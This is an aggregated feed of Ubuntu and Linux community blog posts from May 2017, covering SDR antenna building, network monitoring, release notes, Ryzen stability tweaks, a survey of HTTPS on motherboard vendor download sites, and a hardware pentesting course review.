Inevitably security remains the key concern that IoT developers face, followed by interoperability and connectivity. Interestingly, interoperability was deemed less of a concern than both the 2015 and 2016 surveys indicating that the increase in number and influence of IoT consortiums is starting to have a positive effect. The Eclipse Foundation and IEEE were seen as the top two most important to those organisations who responded. Efforts to create standardisation in the industry such as the introduction of snaps, a universal Linux packaging format, may also be a factor in the lower interoperability concerns highlighted in 2017.

Many of the findings of the 2017 survey correlate with other industry reports, showing a consistent theme across the board. Although IoT continues to evolve at a fast rate, this survey confirms that many of the concerns remain the same regardless of industry, and all those in the IoT ecosystem should continue to collaborate to help overcome these challenges.

The full results can be viewed here, or the key findings are summarised here.

17 May, 2017 09:43AM

May 16, 2017

Aaron Honeycutt: Kubuntu Artful Cycle work – Part1

This cycle I’ve decided to look at what art and design I can improve in Kubuntu. The first item was something we’ve never had: a wallpaper contest that’s open to ALL users. We’re encouraging all our artist users to submit work ranging from digital art to photography and beyond! You all have until June 8 to submit your wonderful and artful work.

I’ve also taken a look at our slideshow in its current state:

After a weekend, a few extra days and some great feedback from both our Kubuntu community and the KDE VDG, I’m really pleased with the improvement. It’s based on the work the Ubuntu Budgie team have done on their slideshow so a HUGGGGEEEE shout out to them for their great work. Here is the current WIP state:

Currently the work is in my own branch of the ubiquity-slideshow-ubuntu package on Launchpad. Once I’ve mostly finished and we’ve gotten some feedback, I’ll send a merge request to put it in the main package, and it will be brought to you in Kubuntu 17.10.

16 May, 2017 10:40PM

Daniel Pocock: Building an antenna and receiving ham and shortwave stations with SDR

In my previous blog on the topic of software defined radio (SDR), I provided a quickstart guide to using gqrx, GNU Radio and the RTL-SDR dongle to receive FM radio and the amateur 2 meter (VHF) band.

Using the same software configuration and the same RTL-SDR dongle, it is possible to add some extra components and receive ham radio and shortwave transmissions from around the world.

Here is the antenna setup from the successful SDR workshop at OSCAL'17 on 13 May:

After the workshop on Saturday, members of the OSCAL team successfully reconstructed the SDR and antenna at the Debian info booth on Sunday and a wide range of shortwave and ham signals were detected:

Here is a close-up look at the laptop, RTL-SDR dongle (above laptop), Ham-It-Up converter (above water bottle) and MFJ-971 ATU (on right):

Buying the parts

Components, with purpose/notes and an approximate price for each:

  • RTL-SDR dongle (~ € 25): Converts radio signals (RF) into digital signals for reception through the USB port. It is essential to buy a dongle for SDR with TCXO; the generic RTL dongles for TV reception are not stable enough for anything other than TV.
  • Enamelled copper wire, 25 meters or more (~ € 10): Loop antenna. Thicker wire provides better reception and is more suitable for transmitting (if you have a license) but it is heavier. The antenna I've demonstrated at recent events uses 1mm thick wire.
  • 4 (or more) ceramic egg insulators (~ € 10): Attach the antenna to string or rope. Smaller insulators are better as they are lighter and less expensive.
  • 4:1 balun (from € 20): The actual ratio of the balun depends on the shape of the loop (square, rectangle or triangle) and the point where you attach the balun (middle, corner, etc). You may want to buy more than one balun, for example, a 4:1 balun and also a 1:1 balun to try alternative configurations. Make sure it is waterproof, has hooks for attaching a string or rope, and has an SO-239 socket.
  • 5 meter RG-58 coaxial cable with male PL-259 plugs on both ends (~ € 10): If using more than 5 meters, or if you want to use higher frequencies above 30 MHz, use thicker, heavier and more expensive cables like RG-213. The cable must be 50 ohm.
  • Antenna Tuning Unit (ATU) (~ € 20 for receive only, or second hand): I've been using the MFJ-971 for portable use and demos because of the weight. There are even lighter and cheaper alternatives if you only need to receive.
  • PL-259 to SMA male pigtail, up to 50cm, RG58 (~ € 5): Joins the ATU to the up-converter. The cable must be RG58 or another 50 ohm cable.
  • Ham It Up v1.3 up-converter (~ € 40): Mixes the HF signal with a signal from a local oscillator to create a new signal in the spectrum covered by the RTL-SDR dongle.
  • SMA (male) to SMA (male) pigtail (~ € 2): Joins the up-converter to the RTL-SDR dongle.
  • USB charger and USB type B cable (~ € 5): Used to power the up-converter. A spare USB mobile phone charger plug may be suitable.
  • String or rope (€ 5): For mounting the antenna. A lighter and cheaper string is better for portable use, while a stronger and weather-resistant rope is better for a fixed installation.

Building the antenna

There are numerous online calculators for measuring the amount of enamelled copper wire to cut.

For example, for a centre frequency of 14.2 MHz on the 20 meter amateur band, the antenna length is 21.336 meters.
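The arithmetic behind such calculators is essentially the wavelength formula λ = c / f, plus a small correction factor for wire thickness and loop shape, which is why quoted lengths like 21.336 m differ slightly from the raw wavelength. A quick sketch of the raw calculation:

```shell
# Raw wavelength for a full-wave loop: lambda = c / f.
# 299.792458 is the speed of light in m/s divided by 1e6,
# so the frequency can be given directly in MHz.
f_mhz=14.2
awk -v f="$f_mhz" 'BEGIN { printf "wavelength: %.3f m\n", 299.792458 / f }'
# prints: wavelength: 21.112 m
```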

Add an extra 24 cm (extra 12 cm on each end) for folding the wire through the hooks on the balun.

After cutting the wire, feed it through the egg insulators before attaching the wire to the balun.

Measure the extra 12 cm at each end of the wire and wrap some tape around there to make it easy to identify in future. Fold it, insert it into the hook on the balun and twist it around itself. Use between four to six twists.

Strip off approximately 0.5cm of the enamel on each end of the wire with a knife, sandpaper or some other tool.

Insert the exposed ends of the wire into the screw terminals and screw it firmly into place. Avoid turning the screw too tightly or it may break or snap the wire.

Insert string through the egg insulators and/or the middle hook on the balun and use the string to attach it to suitable support structures such as a building, posts or trees. Try to keep it at least two meters from any structure. Maximizing the surface area of the loop improves the performance: a circle is an ideal shape, but a square or 4:3 rectangle will work well too.

For optimal performance, if you imagine the loop is on a two-dimensional plane, the first couple of meters of feedline leaving the antenna should be on the plane too and at a right angle to the edge of the antenna.

Join all the other components together using the coaxial cables.

Configuring gqrx for the up-converter and shortwave signals

Inspect the up-converter carefully. Look for the crystal and find the frequency written on the side of it. The frequency written on the specification sheet or web site may be wrong so looking at the crystal itself is the best way to be certain. On my Ham It Up, I found a crystal with 125.000 written on it, this is 125 MHz.

Launch gqrx, go to the File menu and select I/O devices. Change the LNB LO value to match the crystal frequency on the up-converter, with a minus sign. For my Ham It Up, I use the LNB LO value -125.000000 MHz.

Click OK to close the I/O devices window.

On the Input Controls tab, make sure Hardware AGC is enabled.

On the Receiver options tab, change the Mode value. Commercial shortwave broadcasts use AM and amateur transmission use single sideband: by convention, LSB is used for signals below 10MHz and USB is used for signals above 10MHz. To start exploring the 20 meter amateur band around 14.2 MHz, for example, use USB.

In the top of the window, enter the frequency, for example, 14.200 000 MHz.

Now choose the FFT Settings tab and adjust the Freq zoom slider. Zoom until the width of the display is about 100 kHz, for example, from 14.15 on the left to 14.25 on the right.

Click the Play icon at the top left to start receiving. You may hear white noise. If you hear nothing, check the computer's volume controls, move the Gain slider (bottom right) to the maximum position and then lower the Squelch value on the Receiver options tab until you hear the white noise or a transmission.

Adjust the Antenna Tuner knobs

Now that gqrx is running, it is time to adjust the knobs on the antenna tuner (ATU). Reception improves dramatically when it is tuned correctly. Exact instructions depend on the type of ATU you have purchased, here I present instructions for the MFJ-971 that I have been using.

Turn the TRANSMITTER and ANTENNA knobs to the 12 o'clock position and leave them like that. Turn the INDUCTANCE knob while looking at the signals in the gqrx window. When you find the best position, the signal strength displayed on the screen will appear to increase (the animated white line should appear to move upwards and maybe some peaks will appear in the line).

When you feel you have found the best position for the INDUCTANCE knob, leave it in that position and begin turning the ANTENNA knob clockwise looking for any increase in signal strength on the chart. When you feel that is correct, begin turning the TRANSMITTER knob.

Listening to a transmission

At this point, if you are lucky, some transmissions may be visible on the gqrx screen. They will appear as darker colours in the waterfall chart. Try clicking on one of them, the vertical red line will jump to that position. For a USB transmission, try to place the vertical red line at the left hand side of the signal. Try dragging the vertical red line or changing the frequency value at the top of the screen by 100 Hz at a time until the station is tuned as well as possible.

Try and listen to the transmission and identify the station. Commercial shortwave broadcasts will usually identify themselves from time to time. Amateur transmissions will usually include a callsign spoken in the phonetic alphabet. For example, if you hear "CQ, this is Victor Kilo 3 Tango Quebec Romeo" then the station is VK3TQR. You may want to note down the callsign, time, frequency and mode in your log book. You may also find information about the callsign in a search engine.

The video demonstrates reception of a transmission from another country, can you identify the station's callsign and find his location?

If you have questions about this topic, please come and ask on the Debian Hams mailing list. The gqrx package is also available in Fedora and Ubuntu but it is known to crash on startup in Ubuntu 17.04. Users of other distributions may also want to try the Debian Ham Blend bootable ISO live image as a quick and easy way to get started.

16 May, 2017 06:34PM

Raphaël Hertzog: Freexian’s report about Debian Long Term Support, April 2017

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In April, about 190 work hours have been dispatched among 13 paid contributors. Their reports are available:

  • Antoine Beaupré did 19.5 hours (out of 16h allocated + 5.5 remaining hours, thus keeping 2 extra hours for May).
  • Ben Hutchings did 12 hours (out of 15h allocated, thus keeping 3 extra hours for May).
  • Brian May did 10 hours.
  • Chris Lamb did 18 hours.
  • Emilio Pozuelo Monfort did 17.5 hours (out of 16 hours allocated + 3.5 hours remaining, thus keeping 2 hours for May).
  • Guido Günther did 12 hours (out of 8 hours allocated + 4 hours remaining).
  • Hugo Lefeuvre did 15.5 hours (out of 6 hours allocated + 9.5 hours remaining).
  • Jonas Meurer did nothing (out of 4 hours allocated + 3.5 hours remaining, thus keeping 7.5 hours for May).
  • Markus Koschany did 23.75 hours.
  • Ola Lundqvist did 14 hours (out of 20h allocated, thus keeping 6 extra hours for May).
  • Raphaël Hertzog did 11.25 hours (out of 10 hours allocated + 1.25 hours remaining).
  • Roberto C. Sanchez did 16.5 hours (out of 20 hours allocated + 1 hour remaining, thus keeping 4.5 extra hours for May).
  • Thorsten Alteholz did 23.75 hours.

Evolution of the situation

The number of sponsored hours decreased slightly and we’re now again a little behind our objective.

The security tracker currently lists 54 packages with a known CVE and the dla-needed.txt file 37. The number of open issues is comparable to last month.

Thanks to our sponsors



16 May, 2017 03:52PM

Cumulus Linux

Data center network monitoring best practices part 3: Modernizing tooling

Implementing your strategy using modern tooling

In the previous two posts we discussed gathering metrics for long-term trend analysis and then combining them with event-based alerts for actionable results. In order to combine these two elements, we need strong network monitoring tooling that allows us to overlay these activities into an effective solution.

Understanding drawbacks of older network monitoring tooling

The legacy approach to monitoring is to deploy a monitoring server that periodically polls your network devices via Simple Network Management Protocol. SNMP is a very old protocol, originally developed in 1988. While some things do get better with age, computer protocols are rarely one of them. SNMP has been showing its age in many ways.


SNMP uses data structures called MIBs to exchange information. These MIBs are often proprietary, and difficult to modify and extend to cover new and interesting metrics.

Polling vs event driven

Polling doesn’t offer enough granularity to catch all events. For instance, even if you check disk utilization once every five minutes, you may go over threshold and back in between intervals and never know.

An inefficient protocol

SNMP’s polling design is a “call and response” protocol: the monitoring server sends a request to the network device for one or more metrics, and the network device responds with the requested information. The downside is that CPU cycles are expended to receive each request, process it and send a response back to the monitoring server. When the CPU is very busy, requests may have to be queued until the CPU can service them. And since requests travel over UDP by default, if one gets dropped or the queue is full, the monitoring server has to send a whole new request, which just consumes more CPU.

Imagine for a moment that multiple monitoring servers are polling each node and this process is fully repeated for each monitoring server. You could have 10 monitoring servers polling each network device with network admins afraid to restrict access because they don’t want to risk the consequences of impacting another team’s network monitoring tooling. It is easy to see that this core behavior is a recipe for disaster at larger scales.
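To see why this scales badly, here is a back-of-envelope sketch; all numbers are illustrative assumptions, not measurements:

```shell
# Rough request volume for a single device under redundant SNMP polling.
servers=10     # monitoring servers polling each device (assumed)
metrics=50     # OIDs requested per poll cycle (assumed)
interval=300   # poll interval in seconds (5 minutes, assumed)
per_day=$(( 86400 / interval * servers * metrics ))
echo "SNMP requests per device per day: ${per_day}"
```

Multiply that again by thousands of devices and the aggregate load on both the pollers and the polled CPUs becomes substantial.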

Next generation monitoring is agent based

Of course, Cumulus Networks supports SNMP, but today there are better approaches. Newer techniques for monitoring ditch the older “call and response” approach in favor of something called streaming telemetry. In this approach, an agent runs on the switch and periodically sends metrics of interest directly to a database, typically a newer time-series database. From there, the data in the database can be analyzed, alerts can be triggered if thresholds are crossed, remediation actions can be taken for failures and ultimately, the data can be displayed in a dashboard.
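As a sketch of what such an agent looks like in practice, here is a minimal Telegraf-style configuration. The plugin names are real Telegraf plugins, but the interval, URL and database name are illustrative assumptions:

```toml
# Collect a few host metrics every 10s and stream them to a time-series DB.
[agent]
  interval = "10s"

[[inputs.cpu]]
[[inputs.mem]]
[[inputs.net]]

[[outputs.influxdb]]
  urls = ["http://monitor.example.com:8086"]   # assumed collector address
  database = "network_metrics"                 # assumed database name
```

Note the inversion of control: the switch pushes metrics on its own schedule, so no poller has to ask for them.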

Monitoring agents also overcome a challenge that is native to SNMP polling: state retention. SNMP has no contextual understanding of state; it has no idea what the output of the previous poll request was. Since a monitoring agent is its own autonomous entity, it can be configured to store that data (either on box or in memory) to enable smarter analysis and responses than SNMP allows. It also doesn’t have to send data only when polled, so it can save CPU on the sender by sending only relevant data. This is normally done through a user-configured script.

Flexibility and choice in network monitoring tooling 

There are a lot of monitoring agents out there, and they interact with Cumulus Linux in their own unique ways. Some of them have many built-in plugins that have access to metrics native to Cumulus Linux, while others make it easy to create custom scripts.

In working with customers that are implementing this paradigm of monitoring, we found operational efficiencies by using the same agents that have been deployed on servers. Since Cumulus Linux works with any Linux agent, we’ve seen a reduction in the need for unique independent solutions per vendor.

Customizable metrics 

Agents can be configured to send all different kinds of data, meaning metrics can be infinitely customizable based on the needs of the organization. With agent-based monitoring on a fully functional Linux platform like Cumulus Linux, you can write a script to make truly anything a metric. You have the ability to do some additional processing on the switch to produce metrics that correlate multiple items, making them more intelligent, useful and actionable.
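For example, a hypothetical custom-metric script might correlate a couple of values and emit a single record in a line-protocol-style format that an agent's exec-style input could collect on a schedule. The measurement, tag and field names here are made up for illustration:

```shell
# Emit one custom metric record; an agent would run this script
# periodically and forward the output. All names are illustrative.
host="switch1"
uplink_errors=3
uplink_util=72   # percent, e.g. derived from interface counters
line="uplink_health,host=${host} errors=${uplink_errors},utilization=${uplink_util}"
echo "${line}"
```

Because the correlation happens on the switch, the monitoring server receives one meaningful metric instead of several raw counters it would have to join itself.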

Because metrics are sent directly to the monitoring server without it having to process a request for the data, and because metrics can be sent all at once instead of being collected individually for each destination when sending to multiple databases, CPU resources are used as efficiently as possible. You can also aggregate metrics from multiple sources: syslog messages can be sent alongside other custom metrics into the same database, which provides a more holistic view of the network and significant advantages for event correlation and alerting.

Next steps in your data center network monitoring

If you’re looking for a starting point on your monitoring journey to network nirvana, check out our Monitoring Project on GitHub. It is a homegrown example solution built using agent-based techniques: Telegraf runs on the switches and sends metrics to an InfluxDB time-series database, which is ultimately displayed in a Grafana dashboard frontend. The Monitoring Project can be extended to monitor anything you like and is available free of charge.

Cumulus Networks is also working on a solution to help you get better visibility and intelligence in the management of your network. Keep an eye out for more on the general availability of that solution soon!

Finally, join our Slack if you have any questions about network monitoring tooling or need help extending the solution for your environment. Or reach out to our professional services team for additional help designing your ideal monitoring environment, we’re always happy to help!

We look forward to hearing from you!

The post Data center network monitoring best practices part 3: Modernizing tooling appeared first on Cumulus Networks Blog.

16 May, 2017 03:04PM by Eric Pulvino

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: DataArt release new version of Alexa Virtual Device for Raspberry Pi

This is a guest post by DataArt. If you would like to contribute a guest post, please contact

This project aims to provide the ability to bring Alexa to any Linux device including embedded systems like Raspberry Pi or DragonBoard boards. The binary release is packed into a snap package, which is a perfect way to deliver this project.

Short instructions to run it with snap:
You need to create your own Alexa Device on the Amazon developer portal. Follow this manual to create your own device and security profile –
Add http://alexa.local:3000/authresponse to the Allowed Return URLs and http://alexa.local:3000 to the Allowed Origins.
Connect an audio device: a microphone and speakers to your device. It could be a USB headset for example.
Install the PulseAudio snap:

sudo snap install --devmode pulseaudio

Install the Alexa snap from the store:

sudo snap install --channel beta alexa

Open http://alexa.local:3000 in a web browser on the local device or a device on the same network. Note: the app provides an mDNS advertisement of the local domain alexa.local. This is very helpful for use with monitorless devices.

Fill in the device credentials that were created during step 1 and click ‘log in’. Note: the voice detection threshold is a float value for adjusting voice detection; the smaller the value, the easier it is to trigger. You may need to adjust it for your mic and voice.

Fill in your amazon credentials.

Now you can speak with Alexa. The app uses voice activation: say ‘Alexa’ followed by the phrase that you want to say to her. The app beeps through the speakers when it hears the ‘Alexa’ keyword and starts recording.

Enjoy Alexa without the need to buy special hardware 🙂

16 May, 2017 03:00PM

The Fridge: Ubuntu Weekly Newsletter Issue 507

Welcome to the Ubuntu Weekly Newsletter. This is issue #507 for the weeks May 1-15, 2017, and the full version is available here.

In this issue we cover:

This issue of the Ubuntu Weekly Newsletter is brought to you by:

  • Simon Quigley
  • Chris Guiver
  • Nathan Handler
  • Jose Antonio Rey
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution ShareAlike 3.0 License.

16 May, 2017 04:20AM

May 15, 2017

Colin King: Firmware Test Suite Text Based Front-End

The Firmware Test Suite (FWTS) has an easy to use text based front-end that is primarily used by the FWTS Live-CD image but it can also be used in the Ubuntu terminal.

To install and run the front-end use:

 sudo apt-get install fwts-frontend  
sudo fwts-frontend-text

...and one should see a menu of options:

In this demonstration, the "All Batch Tests" option has been selected:

Tests will be run one by one and a progress bar shows the progress of each test. Some tests run very quickly, others can take several minutes depending on the hardware configuration (such as number of processors).

Once the tests are all complete, the following dialogue box is displayed:

The test run has saved several files into the directory /fwts/15052017/1748/ and, by selecting Yes, one can view the results log in a scroll-box:

Exiting this, the FWTS frontend dialog is displayed:

Press enter to exit (note that the Poweroff option is just for the fwts Live-CD image version of fwts-frontend).

The tool dumps various logs, for example, the above run generated:

 ls -alt /fwts/15052017/1748/  
total 1388
drwxr-xr-x 5 root root 4096 May 15 18:09 ..
drwxr-xr-x 2 root root 4096 May 15 17:49 .
-rw-r--r-- 1 root root 358666 May 15 17:49 acpidump.log
-rw-r--r-- 1 root root 3808 May 15 17:49 cpuinfo.log
-rw-r--r-- 1 root root 22238 May 15 17:49 lspci.log
-rw-r--r-- 1 root root 19136 May 15 17:49 dmidecode.log
-rw-r--r-- 1 root root 79323 May 15 17:49 dmesg.log
-rw-r--r-- 1 root root 311 May 15 17:49 README.txt
-rw-r--r-- 1 root root 631370 May 15 17:49 results.html
-rw-r--r-- 1 root root 281371 May 15 17:49 results.log

acpidump.log is a dump of the ACPI tables in a format compatible with the ACPICA acpidump tool. The results.log file is a copy of the results generated by FWTS, and results.html is an HTML-formatted version of the log.

15 May, 2017 05:27PM by Colin Ian King

Bryan Quigley: Who we trust | Building a computer

I thought I was being smart.  By not buying through AVADirect I wasn’t going to be using an insecure site to purchase my new computer.

For the curious, I ended up purchasing through eBay (A rating) and Newegg (A rating) a new Ryzen (very nice chip!) based machine that I assembled myself. The computer is working mostly OK, but has some stability issues. A BIOS update comes out on the MSI website promising some stability fixes, so I decide to apply it.

The page that links to the download is HTTPS, but the actual download itself is not.
I flash the BIOS and now appear to have a brick.

As part of troubleshooting I find that the MSI website has bad HTTPS security, the worst page being:

Given the poor security and now wanting a motherboard with a more reliable BIOS  (currently I need to send the board back at my expense for an RMA) I looked at other Micro ATX motherboards starting with a Gigabyte which has even less pages using any HTTPS and the ones that do are even worse:

Unfortunately a survey of motherboard vendors indicates MSI failing with Fs might put them in second place.   Most just have everything in the clear, including passwords.   ASUS clearly leads the pack, but no one protects the actual firmware/drivers you download from them.

Vendor                     | Main Website          | Support Site | RMA Process | Forum                | Download Site | Actual Download
MSI                        | F                     | F            | F           | F                    | F             | Plain Text
AsRock                     | Plain Text            | Email        | Email       | Plain Text           | Plain Text    | Plain Text
Gigabyte (login site is F) | Plain Text            | Plain Text   | Plain Text  | Plain Text           | Plain Text    | Plain Text
EVGA                       | Plain Text default/A- | Plain Text   | Plain Text  | A                    | Plain Text    | Plain Text
ASUS                       | A-                    | A-           | B           | Plain Text default/A | A-            | Plain Text
BIOSTAR                    | Plain Text            | Plain Text   | Plain Text  | n/a?                 | Plain Text    | Plain Text

A quick glance indicates that vendors that make full systems use more security (ASUS and MSI being examples of system builders).

We rely on the security of these vendors for most self-built PCs. We should demand HTTPS by default across the board. It’s 2017 and a BIOS file is 8 MB; cost hasn’t been a factor for years.
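Until vendors fix this, the least a user can do is verify a published checksum before flashing anything downloaded over plain HTTP. A sketch of the mechanics follows; the file name is hypothetical, and here the "published" hash is computed locally just to demonstrate the check:

```shell
# Create a stand-in for a downloaded BIOS image.
printf 'firmware-bytes' > bios-image.bin
# In reality this hash would come from the vendor over an authenticated channel.
expected=$(sha256sum bios-image.bin | awk '{print $1}')
# Verify the download against the published hash before flashing.
# Note: sha256sum -c expects "hash  filename" (two spaces).
echo "${expected}  bios-image.bin" | sha256sum -c -
```

Of course, a checksum fetched from the same insecure page adds little; signed firmware and HTTPS downloads are the real fix.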

15 May, 2017 03:46PM

Bryan Quigley: Ryzen so far…

So my first iteration ended in a failed BIOS update…  Now I have a fresh MB.

Iteration 2 – disable everything

The Ryzen machine is running pretty stable now with a few tweaks. I was getting some memory paging bugs, but one of these things worked around it:

  • Moved from 4.10 (stock zesty) to 4.11 mainline kernel
  • Remove 1 of my 2 16 GB sticks of memory
  • Underclock memory from 2400 -> 2133
  • Re-enable VM support (SVM)
  • Disable the C6 state
  • Disable boost

It was totally stable for several days after that..

Iteration 3 – BIOS update

Trying to have less things disabled (or more specifically to get my full 32 GB of ram) I did the latest (7A37v14) BIOS update (with all cables not important for the update removed).

Memtest had also intermittently shown bad RAM, but I can no longer reproduce it. Both sticks tested independently show nothing is wrong. Then I put both back in and it says it’s fine.

Part of that was resetting the settings above and although it was more stable I was still getting random crashes.

Iteration 4 – Mostly just underclock the RAM

  • Underclocked 32 GB of  memory from 2400 -> 2133
  • On 4.11 kernel mainline kernel with Nouveau drivers (previously on Nvidia prop. driver, but didn’t support 4.11 at the time)

So far it’s been stable and that’s what I’m running.

Outstanding things

  • CPU Temperature Reporting on Linux is Missing.  (AMD has to release the data to do so – see some discussion here.  That is a community project, posting there will not help AMD do anything)
  • Being coreboot friendly with these new chips
  • Update BIOS from Linux?
  • Why is VM support disabled by default? (It’s called SVM on these boards)
  • MSI please document/implement BIOS recover for these motherboards


The Ryzen 1700 is a pretty powerful chip. I love having 16 threads available to me (VMs and faster compiling are what I wanted from Ryzen, and it delivers). Like many new products there are some stumbling blocks for early adopters, but I feel like on my hardware combination* I’m finally seeing the stability I need.

*Stability testing was just leaving BOINC running (with SETI and NFS projects) with Firefox open, and doing normal work with VMs, etc.
Ryzen 1700
2 x Patriot 16GB DDR4-2400  PSD416G24002H

15 May, 2017 03:45PM

hackergotchi for Wazo


Sprint Review 17.07

Hello Wazo community! Here comes the release of Wazo 17.07!

New features in this sprint

Admin UI: The new web interface based on our REST API is now available for preview. See Wazo admin UI

Admin UI: IVR can now be managed from the admin UI

Admin UI: CDRs can now be listed and searched from the admin UI instead of downloading a CSV from the old web interface.

Admin UI: Conference rooms using Asterisk confbridge can be managed using the admin UI

Admin UI: Parkings using Asterisk parking lots can be managed using the admin UI

Admin UI: Plugins can be managed from the admin UI

REST API: We have added a new REST API to manage wazo plugins using wazo-plugind. This new API is used by the administration UI to install and enable features.

REST API: CDRs can now be queried by a user to get their own call logs.

Ongoing features

Call logs: We are attaching more data to the call logs and generating new views to have a summary for a given query instead of a list of call logs.

Admin UI: We are working to improve the new web interface.

Plugin management: There is still a lot to be done on the plugin management service, e.g. dependencies, upgrades, Wazo version constraints, HA, etc.

The instructions for installing Wazo or upgrading Wazo are available in the documentation.

For more details about the aforementioned topics, please see the roadmap linked below.

See you at the next sprint review!


15 May, 2017 04:00AM by The Wazo Authors

May 14, 2017

hackergotchi for Ubuntu developers

Ubuntu developers

Aaron Honeycutt: LFNW 2017!

LinuxFest Northwest was a fantastic time for me. Our Ubuntu booth had Valorie (Kubuntu) and Simon (Kubuntu/Lubuntu), and over at the Jupiter Broadcasting booth we had the awesome Martin Wimpress (Ubuntu MATE). One top question was “what about that Unity news?”, to which we gave a clear answer: Unity development is ending and Ubuntu is moving to GNOME. Since we were also burning DVDs and dd'ing USB drives, we would recommend that users try out GNOME Shell if GNOME was their preferred desktop.





We had plenty of bonding experiences as part of the Kubuntu team, both forming new memories together and reliving other times at previous conferences. Since I had brought the lovely Cards Against Humanity and the System76 folks had a great BBQ at their hotel the first night, we took full advantage of the deck.





While we had our fun, we did get work done, including some work on our installer slideshow and two pull requests from Simon for the Kubuntu Manual. One was to fix a lot of warnings that would appear when running any of the ‘make’ commands, and the other enabled Travis CI support! So now every time we push anything to our GitHub repository it runs ‘make html/epub/latexpdf’ automatically.

The ever-amazing Ubuntu community helped this happen, so please do donate if you have a few extra dollars to help send more people to conferences to work together in person. These in-person meetings help our teams bond and work even better together.


14 May, 2017 05:14PM

Kubuntu General News: Plasma bugfix releases, Frameworks, & selected app updates now available in backports PPA for Zesty and Xenial

Plasma Desktop 5.9.5 for Zesty 17.04, 5.8.6 for Xenial 16.04,  KDE Frameworks 5.33 and some selected application updates are now available via the Kubuntu backports PPA.

The updates include:

Kubuntu 17.04 – Zesty Zapus.

  • Plasma 5.9.5 bugfix release
  • KDE Frameworks 5.33
  • Digikam 5.5.5
  • Krita 3.1.3
  • Konversation 1.7.2
  • Krusader 2.6
  • Yakuake 3.0.4
  • Labplot 2.4

Kubuntu 16.04 – Xenial Xerus

  • Plasma 5.8.6 bugfix release
  • KDE Frameworks 5.33
  • Krita 3.1.3

We hope that the additional application updates for 17.04 above will soon be available for 16.04.

To update, use the Software Repository Guide to add the following repository to your software sources list:


or if already added, the updates should become available via your preferred updating method.

Instructions on how to manage PPA and more info about the Kubuntu PPAs can be found in the Repositories Documentation

The PPA can be added manually in the Konsole terminal with the command:

sudo add-apt-repository ppa:kubuntu-ppa/backports

and packages then updated with

sudo apt-get update
sudo apt-get dist-upgrade

14 May, 2017 09:36AM

May 13, 2017

Arthur Schiwon: Bookmarks for Nextcloud 0.10.0 released

"bookmarks" by Audrey B., CC BY 2.0

I am happy to announce the availability of Bookmarks for Nextcloud 0.10.0! Bookmarks is a simple way to manage the remarkable websites and pages you come across on the Internet. Bookmarks 0.10.0 provides API methods to create, read, update and delete your bookmarks as well as compatibility with upcoming Nextcloud 12, next to smaller improvements and fixes.

Bookmarks 0.10 is available in the Nextcloud App Store and thus, of course, from your Nextcloud app management. As of this release, Bookmarks no longer officially supports ownCloud.

Personally I had hoped to release sooner, and if it were not for Marcel Klehr it would have been terribly late. He added the API methods, did a lot of code consolidation, migrated away from the deprecated database interface, and while doing so fixed the annoying tag-rename bug. Kudos for his great efforts! Apart from him, I would also like to thank adsworth, brantje, Henni and LukasReschke for their contributions to this release!

Developers interested in the API can check out the documentation at the README file of our project, which was also written by Marcel.

Finally, there will be the next annual Nextcloud Conference in Berlin. It will take place from Aug 22nd to Aug 29th, and the Call for Papers is still open. Any sort of (potential) contributor is warmly welcome!

13 May, 2017 09:49PM

hackergotchi for ARMBIAN


Orange Pi Zero 2+ H5

Ubuntu server – mainline kernel
.torrent (recommended)
Command line interface – server usage scenarios.




other download options and archive

Known issues

All currently available OS images for H5 boards are experimental

  • don’t use them for anything productive but just to give constructive feedback to developers
  • shutdown might result in a reboot instead, or the board doesn’t really power off (cut power physically)


Quick start | Documentation


Make sure you have a good & reliable SD card and a proper power supply. Archives can be uncompressed with 7-Zip on Windows, Keka on OS X and 7z on Linux (apt-get install p7zip-full). RAW images can be written with Etcher (all OS).


Insert the SD card into the slot and power the board. The first boot (with DHCP) takes up to 35 seconds with a class 10 SD card on the cheapest board.


Log in as root on the HDMI/serial console or via SSH, using the password 1234. You will be prompted to change this password at first login. Next you will be asked to create a normal, sudo-enabled user account (beware of the default QWERTY keyboard settings at this stage).

13 May, 2017 05:40PM by igorpecovnik

hackergotchi for Ubuntu developers

Ubuntu developers

David Tomaschik: Applied Physical Attacks and Hardware Pentesting

This week, I had the opportunity to take Joe Fitzpatrick’s class “Applied Physical Attacks and Hardware Pentesting”. This was a preview of the course he’s offering at Black Hat this summer, and so it was in a bit of an unpolished state, but I actually enjoyed the fact that it was that way. I’ve taken a class with Joe before, back when he and Stephen Ridley of Xipiter taught “Software Exploitation via Hardware Exploitation”, and I’ve watched a number of his talks at various conferences, so I had high expectations of the course, and he didn’t disappoint.

Some basic knowledge of hardware & hardware pentesting is assumed. While you don’t need to be an electrical engineer (I’m not!), being familiar with how digital signals work (e.g., differential signals or signals referenced to a ground) is useful, and you should have some experience with at least connecting a UART to a device. If you don’t have any of this experience, I suggest taking his course “Applied Physical Attacks on Embedded Systems” before taking this class. (Which is the same recommendation Joe gives.)

During the course, a variety of topics are covered, including:

  • Identifying unknown chips (manufacturers sometimes grind the markings off chips or cover them in epoxy)
  • Identifying unknown protocols (what is a device speaking?)
  • “Speaking” custom protocols in hardware
  • Finding JTAG connections when they’re obvious – or not
  • Using JTAG on devices with unknown processors (i.e., no datasheet available)
  • Building custom hardware implants to carry out attacks
  • Assessing & articulating feasibility and costs of hardware risks

While more introductory courses typically point you at a COTS SOHO router or similar device as a target, this course uses two targets: one custom, and one that uses an unknown microcontroller. These are much more representative of product assessments or red teams, as you’ll often be faced with new or undocumented targets, and so the lab exercises here translate well into those environments.

Joe really knows his stuff, and that much is obvious when you watch videos of him speaking or take any of his classes. He answered questions thoroughly and engaged the class in thoughtful discussion. There were “pen and paper” exercises where he encouraged the class to work in small groups and then we discussed the results, and it was interesting to see differing backgrounds approach the problem in different ways.

One of the mixed blessings of taking his “preview” course was that some of the labs did not go perfectly as planned. I call this a mixed blessing because, although it made the labs take a little longer, I actually feel I learned more by debugging and by Joe’s responses to the parts that weren’t working correctly. It’s important to know that hardware hacking doesn’t always go smoothly, and this lesson was evident in the labs. Joe helped us work around each of the issues, and generally tried to explain what was causing the problems at each stage.

I learned a lot about looking at systems that have no documentation available and finding their flaws and shortcomings. Given the ever-increasing “Internet of Things” deployments, this kind of skillset will only become ever more useful to security practitioners, and Joe is an excellent instructor for the material.

